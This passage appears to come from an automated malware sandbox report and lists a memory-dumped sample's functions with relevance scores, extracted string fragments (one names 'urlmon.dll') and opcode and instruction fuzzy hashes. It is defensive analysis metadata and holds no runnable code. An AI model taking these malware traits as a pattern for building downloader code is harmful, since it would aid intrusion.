              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $($*G$+G$+`*G$2'$6#$?;$A$E $F$J$NC$WD$Y$Y$al$eX$kt$l#$n?$nG$xx$z*$}$[${
              • API String ID: 0-4268252
              • Opcode ID: b1e7b512ca35f87c4249620423eccb3fefbed78162afbc3ba92de6990dbe2db2
              • Instruction ID: 89c06bc58c333611cdeae778d8e21bbf95f178f8c5644927a6e7509083114af0
              • Opcode Fuzzy Hash: b1e7b512ca35f87c4249620423eccb3fefbed78162afbc3ba92de6990dbe2db2
              • Instruction Fuzzy Hash: 3612F0B0D05268CBEB24CF55C894BECBBB1BB44309F1481DAE54D6B381C7B85A89CF65
              Function 03A68F72 Relevance: 7.7, Strings: 6, Instructions: 153COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 6$O$S$\$dC)-$s
              • API String ID: 0-1759645026
              • Opcode ID: 9a43a8b9a58488950e81553bd57fdaec392b5599634c3aced6f8ec91e164c139
              • Instruction ID: b8dcd72561b155d93961e408f218f05c00917884646adfa25266cf15421857e5
              • Opcode Fuzzy Hash: 9a43a8b9a58488950e81553bd57fdaec392b5599634c3aced6f8ec91e164c139
              • Instruction Fuzzy Hash: 755183B2D00218ABDB14DF94DDC9EEFB3B8EF54310F04419EE909AB240E7759A558BA1
              Function 03A76242 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 69
              • API String ID: 0-2545945474
              • Opcode ID: 3b8c53bed5436308056c6d5947c35c9c72433cb1c2ef30e4e394c98c38ee9044
              • Instruction ID: 80dc0177317d2ba0319b2ceb5e225a605eae454c8bdb8c9b57a3af595a893ee9
              • Opcode Fuzzy Hash: 3b8c53bed5436308056c6d5947c35c9c72433cb1c2ef30e4e394c98c38ee9044
              • Instruction Fuzzy Hash: 9B01E9B6D01218AFCB50DFE8C940AEEBBF8EB58600F14466EE909F7200F77456058BA1
              Function 03A68F6B Relevance: 1.3, Strings: 1, Instructions: 36COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: dC)-
              • API String ID: 0-3863301967
              • Opcode ID: d92dcfb3e39c16d3db53120886c28eb88e45c39c938887025e90682cf3b08812
              • Instruction ID: 9807a0a054b477863289af35864d4f100c0ee84c43c6a63fcc3eee377368a8c5
              • Opcode Fuzzy Hash: d92dcfb3e39c16d3db53120886c28eb88e45c39c938887025e90682cf3b08812
              • Instruction Fuzzy Hash: D6F09C659003187FDB20FB60DCC5DEFB37CEB44710F04419AE90C6A280E77459C58755
              Function 03A54E34 Relevance: .1, Instructions: 134COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ddf2c9fa35856c684cf033a116a145d1a0cd093a8f820299e6cb092e186700f
              • Instruction ID: fae17e3f4de2b33b1dd3c157cf699a026f12399b73f038c43a180c045f4b8a42
              • Opcode Fuzzy Hash: 3ddf2c9fa35856c684cf033a116a145d1a0cd093a8f820299e6cb092e186700f
              • Instruction Fuzzy Hash: 93411BB1D11218AFDB04CF9ACD85AEEBBBCFF49710F10415BFA04E6240E7B496418BA0
              Function 03A799C2 Relevance: .1, Instructions: 97COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a96ab047ae41b86e4afcfe38b9c028f7d0f8787f82cbc763b37ea694ab5fe2c6
              • Instruction ID: ad69a2d87a34021e4c442248ae58c604a3054e867ba1d7d7ee37b91c0b3ed59f
              • Opcode Fuzzy Hash: a96ab047ae41b86e4afcfe38b9c028f7d0f8787f82cbc763b37ea694ab5fe2c6
              • Instruction Fuzzy Hash: 9A31B6B5A00249ABDB14DF98D981EDFB7F9FF89310F10821AF909A7340D774A911CBA5
              Function 03A798E2 Relevance: .1, Instructions: 85COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 078d7e3fa8d1d461b27f5d6fc5d15e2d60f4536f5d1abfc03d80e130051df408
              • Instruction ID: a445e2058a3d56a8660098eb1830a6bc30a48fdf46b1b71b434eb555d5695acf
              • Opcode Fuzzy Hash: 078d7e3fa8d1d461b27f5d6fc5d15e2d60f4536f5d1abfc03d80e130051df408
              • Instruction Fuzzy Hash: 9531EBB5A00249ABDB14DF98CD81EEFB7F9EF89300F10811AF919A7340D774A911CBA5
              Function 03A7A262 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 26ccd750cc62859259936078699f1b082c03b18e6cb42c8ffbad1d9715c7102c
              • Instruction ID: 65376afddcef55cf3073f569e12a20ed55ca7541ca3967b91b7a909566e7e833
              • Opcode Fuzzy Hash: 26ccd750cc62859259936078699f1b082c03b18e6cb42c8ffbad1d9715c7102c
              • Instruction Fuzzy Hash: 9A211BB5A00349ABDB14DF98CD81EAFB7A9EF89300F10850AF9099B340D774A911CBA5
              Function 03A68DB2 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9277c5d2806ddd35c67fa547d5e26fb2e56b25ae209fe4187577ac03a5b8dc2a
              • Instruction ID: 145471f2ed6490a17bef76092f0a32382d405068bf2db6846533782057e49db6
              • Opcode Fuzzy Hash: 9277c5d2806ddd35c67fa547d5e26fb2e56b25ae209fe4187577ac03a5b8dc2a
              • Instruction Fuzzy Hash: E91133763803057AF720DE559CC2FAF775C9B95B60F24401AFB08AE2C1D6A5F81147B9
              Function 03A762D2 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56217ad950bd22cc34cc24b17d66afd788f2b86aaa7b11f5c229b9b59dcfd7a2
              • Instruction ID: 79ab0c7a93926441bf3c49945d9a648a338dba3688e7bb4e1a1d9a9b5b270d8e
              • Opcode Fuzzy Hash: 56217ad950bd22cc34cc24b17d66afd788f2b86aaa7b11f5c229b9b59dcfd7a2
              • Instruction Fuzzy Hash: 072100F6D01218AF8B00DFA9D9419EFB7F9FF58210F04466AE909E7240E7749A15CBA1
              Function 03A796F2 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14fc9219b376e267797dedd49a6a76a128788a1a2f5f44cd152696c52a20407b
              • Instruction ID: be8c89098c82926ce3c990878a56ef80ef83373b4307899f3c1e813890dbdeee
              • Opcode Fuzzy Hash: 14fc9219b376e267797dedd49a6a76a128788a1a2f5f44cd152696c52a20407b
              • Instruction Fuzzy Hash: DB115EB5604319ABD710EF58CD85FEF77ACEB85300F10850AF9499B240DB746A11CBA5
              Function 03A79572 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7233f34dd8c9287bda9b85f02e68c48377b1ecb0261f5decb985d8d7ad66a0e
              • Instruction ID: 136179ab12c439e40840bc823bd689addcde2c15271eb4e2fe05159255881439
              • Opcode Fuzzy Hash: e7233f34dd8c9287bda9b85f02e68c48377b1ecb0261f5decb985d8d7ad66a0e
              • Instruction Fuzzy Hash: D5115EB5600319ABDB10EF58CD85FAF77ACEB85310F10850AF9499B240DB74A911CBA5
              Function 03A77612 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cc0dda28da84a3db840bf43dc17847c961a665a98f87772ac25745f744d27140
              • Instruction ID: f1b2eb07c78ce05185f226a4e20d1cae19aabc5cfaa17b7d8e77c8955cea6393
              • Opcode Fuzzy Hash: cc0dda28da84a3db840bf43dc17847c961a665a98f87772ac25745f744d27140
              • Instruction Fuzzy Hash: 961121B6D0121CAFCB00DFE9D9409EEBBF9EF48210F14456FE919E7200E7759A158BA0
              Function 03A725F2 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ae40a0253698a075728daa004a6e1126de0e530e61cf8bf8bf11afe4992c270
              • Instruction ID: 0e95ff488ffd4b0dab8d8b3e2a2e4c51a227278fcd24e5be21708278f9229144
              • Opcode Fuzzy Hash: 3ae40a0253698a075728daa004a6e1126de0e530e61cf8bf8bf11afe4992c270
              • Instruction Fuzzy Hash: 6101A2B6A112246BE311E7A89C86DFFB36CCF55160B040297EC049B300FA669E9147E6
              Function 03A7A5E2 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 63090f0baeb053bda6d4ac60e79ef039ec60d72c1d2e16f213e356ee6e17aee2
              • Instruction ID: 2a8a01a4671ec9c5d787aa11cf25842cf83c191bc8c44791ac85e6e541fc2bcd
              • Opcode Fuzzy Hash: 63090f0baeb053bda6d4ac60e79ef039ec60d72c1d2e16f213e356ee6e17aee2
              • Instruction Fuzzy Hash: AA0180B6214208BBCB54DF99DC90EDB77ADAF8C754F408109BA09E7240D630E951CBA4
              Function 03A54F92 Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e258500821200a20bd468b67d09ec9e7f6494f00eaf1f5ce42f47b372015272f
              • Instruction ID: b018c1fcb6d6b94a3750812179e6adf9744debcd027d224ff15eaf706726c581
              • Opcode Fuzzy Hash: e258500821200a20bd468b67d09ec9e7f6494f00eaf1f5ce42f47b372015272f
              • Instruction Fuzzy Hash: 2CF082736143166BD7109A5EAC80B9AF79CEB99630F250223FD19CA341D675E49583A0
              Function 03A797F2 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0265265e3bf80abd113dd993fc6373f2b13cf5748d77fc2da1fd65cd727a1dac
              • Instruction ID: 0bbcd607acc71a00c8b953ee2a753735ea82a22c8692943ce09ce4a5d4c57da0
              • Opcode Fuzzy Hash: 0265265e3bf80abd113dd993fc6373f2b13cf5748d77fc2da1fd65cd727a1dac
              • Instruction Fuzzy Hash: D7F01CB52002157BDB10DE99DC81EEB77ACEF88710F108409F919D7240D674B911CBB4
              Function 03A68ED2 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b49b709f85a21448ea697e0c50a162a06751debed86aea254176cc2fa97c786
              • Instruction ID: ae3521a2a35c21648cd3f16e9b79fb0f5f8bc6afba3fa0f11ac0c9b9a9efffd7
              • Opcode Fuzzy Hash: 1b49b709f85a21448ea697e0c50a162a06751debed86aea254176cc2fa97c786
              • Instruction Fuzzy Hash: BBF0827180520CEBDB14CFA8D881BDEBBBDEB04320F1043AEE8249B280D63997508B81
              Function 03A7A502 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 653eda6beaca97580ca9b1e8a35783d7e959db80bf7dc2155313d5db26253e23
              • Instruction ID: 697e6304d60ab94f69e01aa1cffd221f0fc6dc484eb08e73fd6b67488c30399e
              • Opcode Fuzzy Hash: 653eda6beaca97580ca9b1e8a35783d7e959db80bf7dc2155313d5db26253e23
              • Instruction Fuzzy Hash: 25E06DB52002047BC610EE59DC41EDB33ACEFC9710F408419F909A7240CA34B911CBB4
              Function 03A7C3B2 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fa5fecadba8898cd551044afca24a905b7e5654296fc05c630ea0916e6f22d6d
              • Instruction ID: 0477a6facd5197c7bfafbf514dabbcc2fbef8a8b486e23b710ffe13c3512053a
              • Opcode Fuzzy Hash: fa5fecadba8898cd551044afca24a905b7e5654296fc05c630ea0916e6f22d6d
              • Instruction Fuzzy Hash: 3EE04F77A4032437C22097999CC5FABF76CDBC1A71F09006AFE089B340E565A90043E5
              Function 03A68ECF Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f574e203ab822ede98554a5572deb14d3fd683d87c0710b43b6510a37b5b41c1
              • Instruction ID: c21a38d5169aa1024bdd376534b98b9c27d97b3dd72b69bdc801686d9126b359
              • Opcode Fuzzy Hash: f574e203ab822ede98554a5572deb14d3fd683d87c0710b43b6510a37b5b41c1
              • Instruction Fuzzy Hash: ECE065718151089BDB04CB64D891B9EBBADDB04350F10476EE819CB280D239D7508741
              Function 03A7A1C2 Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8841ba4d7763490741b4060c920f1954fa416d6dcd72ff7d8bb822730ced3ae9
              • Instruction ID: 5b6b99d1a3822ad1934b6e620fab304db33127f734b26e83db900e36498b7112
              • Opcode Fuzzy Hash: 8841ba4d7763490741b4060c920f1954fa416d6dcd72ff7d8bb822730ced3ae9
              • Instruction Fuzzy Hash: 3CE046B62002147BD620EB5ADC80F9B77ACEBC5710F50851AFA09AB241CA74B91487F0
              Function 03A5BBF0 Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d74481795d05113a2db35f0b347c9bd5b1931ff5f4647ae7cc05da3c0d2c7c3
              • Instruction ID: bfcb6e8f043ef5495b7a4e09693fc839ca7a635d577d13e6c09cf202ed083ea1
              • Opcode Fuzzy Hash: 1d74481795d05113a2db35f0b347c9bd5b1931ff5f4647ae7cc05da3c0d2c7c3
              • Instruction Fuzzy Hash: B1B0124846018121881CB97C1B824C239434445110D40CB51F84B7B3256152019534F3

              Non-executed Functions

              Function 03A64C24 Relevance: 68.9, Strings: 55, Instructions: 171COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
              • API String ID: 0-2725001343
              • Opcode ID: 724d2bb97aa10951969aae5822f5096e726706ad30f2175da36a163168f6a79f
              • Instruction ID: b130568dd2f44a92731ed4ddce44a2c4a867ef970ee6c3e314fef8eda704daf1
              • Opcode Fuzzy Hash: 724d2bb97aa10951969aae5822f5096e726706ad30f2175da36a163168f6a79f
              • Instruction Fuzzy Hash: 22910FF08052A98ACB118F55A5603DFBF71BB95204F1581E9C6AA7B203C3BE4E85DF90
              Function 03A737B2 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
              • API String ID: 0-1002149817
              • Opcode ID: ef69595ee954a19a6b4a112c50e30cfc7f8dd93bfbf5f75a974b666e114f6579
              • Instruction ID: d5f2f329b94b78ff89aea25e373eac62d5d7c01997cdd5a21eabc6a3a6316052
              • Opcode Fuzzy Hash: ef69595ee954a19a6b4a112c50e30cfc7f8dd93bfbf5f75a974b666e114f6579
              • Instruction Fuzzy Hash: 76C140B5D003689EDB60DFA4CD44BEEBBB8AF45304F0081DAD548AB241E7B55A88CF95
              Function 03A5B50F Relevance: 31.4, Strings: 25, Instructions: 101COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $($*G$+G$+`$2'$6#$?;$A$E $F$J$NC$WD$Y$Y$al$eX$kt$n?$nG$xx$}$[${
              • API String ID: 0-1346699954
              • Opcode ID: 5157ba8938cebdce6db70c6c928799886f94bb22bcecdc4286f2c13f99fbeeb8
              • Instruction ID: a2bed0b45427bab380b5a056b52ce04bc0139aaf90f360776a4f38407509224a
              • Opcode Fuzzy Hash: 5157ba8938cebdce6db70c6c928799886f94bb22bcecdc4286f2c13f99fbeeb8
              • Instruction Fuzzy Hash: 48614AB0C05668CBEB60CF81C9997DDBBB1BB45308F108199D55C3B391CBBA1A89CF95
              Function 03A5B512 Relevance: 31.4, Strings: 25, Instructions: 101COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $($*G$+G$+`$2'$6#$?;$A$E $F$J$NC$WD$Y$Y$al$eX$kt$n?$nG$xx$}$[${
              • API String ID: 0-1346699954
              • Opcode ID: 967802b4280391916bd5077911e49f833c879f5af1973ff22fce8650028ef3b0
              • Instruction ID: e4faa59129ebfad699b4174100af5ddd6b47fbecce14011692d8833deab78720
              • Opcode Fuzzy Hash: 967802b4280391916bd5077911e49f833c879f5af1973ff22fce8650028ef3b0
              • Instruction Fuzzy Hash: A9614AB0C05668CBEB60CF81C9997DDBBB1BB45308F108199D55C3B291CBB91A89CF95
              Function 03A705F6 Relevance: 25.3, Strings: 20, Instructions: 267COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
              • API String ID: 0-3236418099
              • Opcode ID: 9de624e6471d0f271127cb383cee21be1e836046f5a13c27a21d7adaf809aba7
              • Instruction ID: 9bc8d3203b0241d7a03d2bb8ea8b090a23399b0c02597d20eb5ef697eb195a8a
              • Opcode Fuzzy Hash: 9de624e6471d0f271127cb383cee21be1e836046f5a13c27a21d7adaf809aba7
              • Instruction Fuzzy Hash: 5E9153B5901318AEEB20DF94DD84FEEB7BDEF45304F4041AAE50CAA240E7755B898F61
              Function 03A6BDA2 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
              • API String ID: 0-392141074
              • Opcode ID: 87927341c713c1065d19cd3be5948563df79707ad85515d44f29b4e459e27890
              • Instruction ID: 376374064ec031c974a66ad89feb8c19f6fa98049db23786c06fa2f692e5f293
              • Opcode Fuzzy Hash: 87927341c713c1065d19cd3be5948563df79707ad85515d44f29b4e459e27890
              • Instruction Fuzzy Hash: B07103B5D00318AADB55DF94CD80FDEB77DBF08700F00869AE519AA240EB755B88CF55
              Function 03A6BD9F Relevance: 16.4, Strings: 13, Instructions: 177COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
              • API String ID: 0-392141074
              • Opcode ID: dcb9bf16f8add72ea8bac095ff8794cc36ad2814b68ee1587e0251dece639bc6
              • Instruction ID: 048bec214c549b25a8b6d67996dff2ad8c24683d66f92a27cbe7a73059acc8bb
              • Opcode Fuzzy Hash: dcb9bf16f8add72ea8bac095ff8794cc36ad2814b68ee1587e0251dece639bc6
              • Instruction Fuzzy Hash: 386111B5D00318AADB65DFA4CD80FDEB77DBF08700F00869AE519AA240EB755788CF65
              Function 03A70ABF Relevance: 12.8, Strings: 10, Instructions: 342COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: :$:$:$A$I$N$P$m$s$t
              • API String ID: 0-2304485323
              • Opcode ID: feaf2d17cfa662352deee3695314e5294a9a7057e5ef61339f16b3c38109adea
              • Instruction ID: ffc084d9f5d982d1a606b48c1721bed49966a51ed781f87aea63756252caff18
              • Opcode Fuzzy Hash: feaf2d17cfa662352deee3695314e5294a9a7057e5ef61339f16b3c38109adea
              • Instruction Fuzzy Hash: 7FD109B5910304ABDB50DFB4CD84FEEB7F9FF58350F04451AE14AAB240EB79A6058BA4
              Function 03A70AC2 Relevance: 12.7, Strings: 10, Instructions: 209COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: :$:$:$A$I$N$P$m$s$t
              • API String ID: 0-2304485323
              • Opcode ID: 900b3094e341506886da5d5f1d7075a913c6a4c627ef1f09a5cdd8d4c3dc3097
              • Instruction ID: 65677d4e0e0e01e61e8902c8b41a1d29a1023df6248669155e9f37588cb815be
              • Opcode Fuzzy Hash: 900b3094e341506886da5d5f1d7075a913c6a4c627ef1f09a5cdd8d4c3dc3097
              • Instruction Fuzzy Hash: 0481F7B5910308ABDB50DFB4CD84BEEB7F9FF58350F04451AE149AB240EB79A6058BA4
              Function 03A58602 Relevance: 12.5, Strings: 10, Instructions: 43COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: -$/$F$J$L$M$Y$k$u$y
              • API String ID: 0-3213266539
              • Opcode ID: 0802501601948fbe9fdc910101d99a0d706e9272abae7dba0ab8098aface9820
